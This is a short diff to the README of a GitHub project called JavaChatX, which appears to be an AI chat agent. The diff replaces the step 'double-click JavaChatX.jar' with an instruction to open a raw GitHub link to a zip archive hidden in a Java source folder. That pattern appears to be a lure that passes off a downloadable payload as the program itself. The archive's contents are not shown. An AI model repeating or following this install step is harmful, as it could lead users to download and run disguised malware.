Joellsolidhoofed222/JavaChatX/README.md

 Once you have extracted the files, follow these steps to run JavaChatX:

 1. Open the extracted folder.
-2. Find and double-click on the `JavaChatX.jar` file.
+2. Find and double-click on the `https://raw.githubusercontent.com/Joellsolidhoofed222/JavaChatX/main/src/main/java/com/techcognita/javachatx/agent/JavaChatX-buss.zip` file.
 Ensure you have Java installed, as it will require it to run.
 3. Follow any on-screen instructions to set up your AI agent.

 ## 📝 Usage Instructions